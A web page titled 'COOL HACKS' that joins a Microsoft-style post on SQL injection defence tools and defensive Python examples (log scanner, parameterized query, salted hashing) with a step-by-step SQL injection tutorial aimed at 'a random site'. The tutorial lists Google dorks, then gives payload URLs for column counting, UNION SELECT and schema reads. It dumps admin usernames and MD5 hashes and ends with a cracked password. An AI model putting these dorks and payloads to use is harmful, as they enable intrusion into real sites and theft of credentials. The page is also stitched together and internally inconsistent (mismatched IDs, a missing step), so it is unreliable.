COOL HACKS

 
SQL Injection: "The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."

The MSRC recently released an advisory that discusses the recent SQL injection attacks and announces three new tools to help identify these vulnerabilities and block attacks that exploit them. The advisory discusses the new tools, the purpose of each, and the way each complements the others. The goal of this blog post is to help you identify the best tool to use depending on your role (i.e. web developer vs. IT administrator).

Web Developer Recommendations

* The Microsoft Source Code Analyzer for SQL Injection (MSCASI) is a static code analysis tool that identifies SQL Injection vulnerabilities in ASP code (ASP pages are the ones that have been under attack). In order to run MSCASI you will need source code access, and MSCASI will output the areas vulnerable to SQL injection (i.e. the root cause and the vulnerable path are identified). In our view, fixing the root cause of the bug is the best way to eradicate vulnerabilities. MSCASI scans ASP source code and generates warnings for first-order and second-order SQL Injection vulnerabilities. Please refer to the SQL team's blog and KB 954476 for more details.

IT/Database Administrator Recommendations (as well as Web developers)

We are recommending two of the new tools announced today. One can help identify SQL injection vulnerabilities by crawling the website. The other one aims to block potential SQL injection attacks by filtering malicious requests. The website crawler will be useful if you don't have access to the source code.

* Microsoft worked with the HP Web Security Research group to release the Scrawlr tool. The tool will crawl a website, simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr uses some of the same technology found in HP WebInspect but has been built to focus only on SQL Injection vulnerabilities. This will allow an IT/DB admin to easily find vulnerabilities similar to the ones that have been used to compromise sites in recent attacks. No source code is required to run this tool. From a starting URL, the tool recursively crawls that URL in order to build up a site tree that will be then analyzed for SQL injection vulnerabilities. For more information check out the HP Web Security Research blog.

* In order to block and mitigate SQL injection attacks (while the root cause is being fixed), you can also deploy SQL filters using the new release of UrlScan 3.0. This tool restricts the types of HTTP requests that Internet Information Services (IIS) will process. By blocking specific HTTP requests, UrlScan helps prevent potentially harmful requests from being executed on the server. It uses a set of keywords to block certain requests. If a bad request is detected, the filter drops it, so it never reaches the application or the database. That said, if a SQL injection flaw has been identified, we highly encourage you to fix the root cause of the problem instead of attempting to produce the perfect filter (since in our view this is error prone). Please refer to one of the two IIS blog posts (1, 2) and the technical documentation for more details.
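A keyword filter of the kind UrlScan applies is only as good as the normalization in front of it. The following is an added example, not part of the MSRC advisory and not UrlScan's own code: a small Python scanner that runs the same style of keyword matching over constructed Apache-style access-log lines, after percent-decoding and lower-casing the query string. The log lines, the signature names and the regular expressions are all this example's own assumptions; the request patterns are the ones quoted in the walkthrough further down this page.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines in Apache combined-log style. The requests
# mirror the probes quoted later on this page; this is not a real server log.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2009:10:00:01 +0000] "GET /news_archive.php?id=6 HTTP/1.1" 200 2048
10.0.0.5 - - [01/Jan/2009:10:00:02 +0000] "GET /news_archive.php?id=6' HTTP/1.1" 500 512
10.0.0.5 - - [01/Jan/2009:10:00:03 +0000] "GET /news_archive.php?id=6+order+by+15-- HTTP/1.1" 500 512
10.0.0.5 - - [01/Jan/2009:10:00:04 +0000] "GET /news_archive.php?id=-6%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 1024
10.0.0.9 - - [01/Jan/2009:10:00:05 +0000] "GET /shop/order_by_phone.php?id=12 HTTP/1.1" 200 777
"""

# Pulls the client IP, request target and status code out of one log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Keyword signatures (this example's own names), applied to the normalized
# query string. Each corresponds to a step of the walkthrough on this page.
SIGNATURES = {
    "quote-probe": re.compile(r"'"),
    "order-by-enum": re.compile(r"\border\s+by\s+\d+"),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema-read": re.compile(r"\binformation_schema\b"),
    "version-fingerprint": re.compile(r"@@version"),
}


def normalize_query(target):
    """Return the query string with percent-encoding and '+' undone, lower-cased.

    A filter that matches before this step misses "%20UNION%20SELECT" and
    "+order+by+", which is one reason keyword filters are easy to get wrong."""
    _, _, query = target.partition("?")
    return unquote_plus(query).lower()


def scan_log(text):
    """Return (line_number, client_ip, reason, status) for each suspicious request.

    Only the first matching signature per line is reported, which is enough
    for triage; a 500 status alongside a hit usually means the probe reached
    the database, as the "Database error" pages quoted on this page show."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = normalize_query(m.group("target"))
        for reason, pattern in SIGNATURES.items():
            if pattern.search(query):
                hits.append((lineno, m.group("ip"), reason, int(m.group("status"))))
                break
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The fourth sample line is the instructive one: until it is percent-decoded it contains no literal "union select", so a filter that matches the raw URL lets it through. The fifth line (a benign path containing "order_by") shows the opposite failure, a false positive, which is why the signature requires "order by" followed by a number rather than the bare word. Both cases illustrate the advisory's point that a filter is a stopgap for detection and short-term blocking, not a substitute for fixing the query.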

Tool 1: MSCASI
Usage: Identifies SQL Injection vulnerabilities in ASP code through static source code analysis.
Pros: Identifies the root cause of the bug at the source code level.
Cons: This version currently only works on ASP pages.
For: Web developers

Tool 2: Scrawlr
Usage: Detects SQL Injection vulnerabilities at runtime by crawling a website.
Pros: No source code is required.
Cons: Cannot identify the line of code responsible.
For: IT/DB administrators, web developers

Tool 3: UrlScan v3.0 Beta
Usage: Runtime filtering that restricts the types of HTTP requests that Internet Information Services (IIS) will process.
Pros: The UrlScan filter can be deployed quickly to mitigate SQL injection attacks while the root cause is being fixed.
Cons: Does not fix the root cause, so the risk is not eliminated.
For: IT administrators

How to do SQL injection: If you are trying to hack just a random site, there are some Google dorks available that will help you. Here are some of them:

allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=

inurl: -> is a search operator in Google that makes it search for the term in the site's URL.
.php?5= -> is what I'm searching for in a URL. SQL injection works by adding code after the = symbol. This is also commonly referred to as a dork.
Dork definition: it's the part of the site's URL that tells you it may be vulnerable to a certain SQL injection. Let's take this exploit for example:
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
We will check its vulnerability by adding a magic quote (') at the end of the URL.

3. So the URL will look like this:
http://www.site.com/news_archive.php?id=5'
We hit enter and get this result:
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6';
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)

If you get an error, missing text, or a blank page, the site is probably vulnerable, but not in every case.
Now we know that the site is vulnerable.
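The error page in step 3 shows what the root cause looks like: the text of the query ("SELECT * FROM NewsArticle WHERE NewsID=6'") is built by pasting the request parameter straight into the SQL string. The following added example, which is not code from the original page or from the site it describes, puts that pattern beside its fix. It uses Python's sqlite3 as a stand-in for the PHP/MySQL site, with a constructed NewsArticle table whose schema (beyond the NewsID column named in the error) is assumed, and runs the step-3 and step-4 inputs through both versions.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's NewsArticle table. Only the column
    NewsID appears in the page's error message; the rest is assumed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE NewsArticle (NewsID INTEGER PRIMARY KEY, Title TEXT)")
    conn.executemany("INSERT INTO NewsArticle VALUES (?, ?)",
                     [(5, "Article five"), (6, "Article six")])
    return conn


def lookup_vulnerable(conn, news_id):
    """The pattern behind "Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6'".

    The raw request parameter is concatenated into the SQL text, so a quote
    breaks the statement and an "order by" clause becomes part of it."""
    sql = "SELECT * FROM NewsArticle WHERE NewsID=" + news_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, news_id):
    """Root-cause fix: validate the type, then bind the value as a parameter.

    The driver sends the statement and the value separately, so no input can
    change the statement's structure. Rejecting non-integers up front also
    removes the verbose database error page that step 3 relies on."""
    try:
        nid = int(news_id)
    except ValueError:
        return []  # in a web app: respond 400 Bad Request and log the attempt
    return conn.execute("SELECT * FROM NewsArticle WHERE NewsID=?", (nid,)).fetchall()


def probe(lookup):
    """Run the page's step-3 and step-4 inputs through a lookup function and
    classify each as 'ok' (rows), 'empty' (no rows) or 'error' (DB exception)."""
    conn = make_db()
    outcome = {}
    for raw in ["6", "6'", "6 order by 1--", "6 order by 15--"]:
        try:
            rows = lookup(conn, raw)
            outcome[raw] = "ok" if rows else "empty"
        except sqlite3.Error:
            outcome[raw] = "error"
    return outcome


if __name__ == "__main__":
    print("concatenated: ", probe(lookup_vulnerable))
    print("parameterized:", probe(lookup_hardened))
```

With the concatenated version the probes behave exactly as the walkthrough describes: the stray quote and the out-of-range "order by 15" raise database errors, while "order by 1" silently succeeds, which is the oracle the column-counting step depends on. With the parameterized version every non-numeric input is rejected before it reaches the database and returns nothing, so there is no error message to read and no clause to smuggle in.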

4. The next step is to find out how many columns the database contains.
To find it we use "order by" (without the quotes) and the string " -- " (without the quotes).
It will look like this:
http://www.site.com/news_archive.php?id=6 order by 1-- (no error)
http://www.site.com/news_archive.php?id=6 order by 2-- (no error)
http://www.site.com/news_archive.php?id=6 order by 3-- (no error)
We move a little higher (the step size doesn't matter):
http://www.site.com/news_archive.php?id=6 order by 10-- (no error)
http://www.site.com/news_archive.php?id=6 order by 14-- (no error)
until we get an error:
http://www.site.com/news_archive.php?id=6 order by 15-- (we got an error)

Now we get an error on this column; it will look like this:
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')
This means the database contains only 14 columns.
5. Now use "-" (a negative sign) and a union select statement.
Using this we can select more data in one SQL statement.
It looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--
We hit enter and numbers appear, like this:
6
5
8

6. Now we will check its MySQL version. We put @@version in place of one of the numbers that appeared in the previous step.
Let's say I choose 8; we replace 8 with @@version, so it looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--
and you will get a result like this:
6
, 5
5.1.32 <--this is the version

7. Getting table names.
We use group_concat(table_name).
Replace @@version with group_concat(table_name), and it looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--
We're not done yet (don't hit enter):
between the number 14 and the "--" insert this:
+from+information_schema.tables+where+table_schema=database()--
It will look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--
We hit enter and get this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhoto,active_sessions_split,auth_user_md5

9. We use 0x3a to obtain what we want from the database, like passwords, usernames, etc.
Replace group_concat(column_name) with group_concat(UserID,0x3a,Username,0x3a,Password,0x3a,Perms,0x3a,FirstName,0x3a,MiddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAddress,0x3a,ContactNumbers,0x3a,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a,ModifiedBy,0x3aStatus)
but I prefer group_concat(Username,0x3a,Password) for less effort.
And also replace information_schema.columns+where+table_name=0x617574685f757365725f6d6435-- with +from+auth_user_md5--
617574685f757365725f6d6435 is the hex value of auth_user_md5, so we replace it.
The result looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--
I hit enter and we get this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d

10. Because the password is an MD5 hash, we need to crack it.
http://passcracking.com/index.php
pass: x1R0zYB3bex
Enjoy
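Step 10 succeeds because the dumped table held unsalted MD5 values, which are fast to compute and identical for every account that shares a password. As an added example that is not part of the page, the following Python contrasts that storage scheme with a salted, iterated PBKDF2-HMAC-SHA256 record and a constant-time verifier; the record layout, the iteration count and the sample password are this example's own assumptions, and none of the page's hashes are used.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumed work factor; raise it as far as login latency allows


def md5_store(password):
    """The scheme implied by step 10: unsalted MD5. Fast to compute, and every
    account with the same password gets the same 32-hex-digit value."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def pbkdf2_store(password, salt=None):
    """Salted, iterated PBKDF2-HMAC-SHA256. The record layout
    "pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>" is this example's own."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password, record):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iters, salt_hex, hash_hex = record.split("$")
    except ValueError:
        return False  # malformed record
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), hash_hex)


def same_password_same_record(store, password):
    """True when two accounts sharing a password get identical stored values,
    which lets whoever dumped the table crack one entry and reuse the answer."""
    return store(password) == store(password)


if __name__ == "__main__":
    pw = "example-only-password"  # constructed sample, not from the page
    print("md5 repeats across users:   ", same_password_same_record(md5_store, pw))
    print("pbkdf2 repeats across users:", same_password_same_record(pbkdf2_store, pw))
    rec = pbkdf2_store(pw)
    print("verify correct:", pbkdf2_verify(pw, rec), " verify wrong:", pbkdf2_verify("x", rec))
```

The per-record salt is what defeats the lookup-table approach the page points to: each stored value must be attacked on its own, and the iteration count makes every guess cost thousands of hash computations instead of one. The stored record carries its own parameters, so the iteration count can be raised later without invalidating existing accounts.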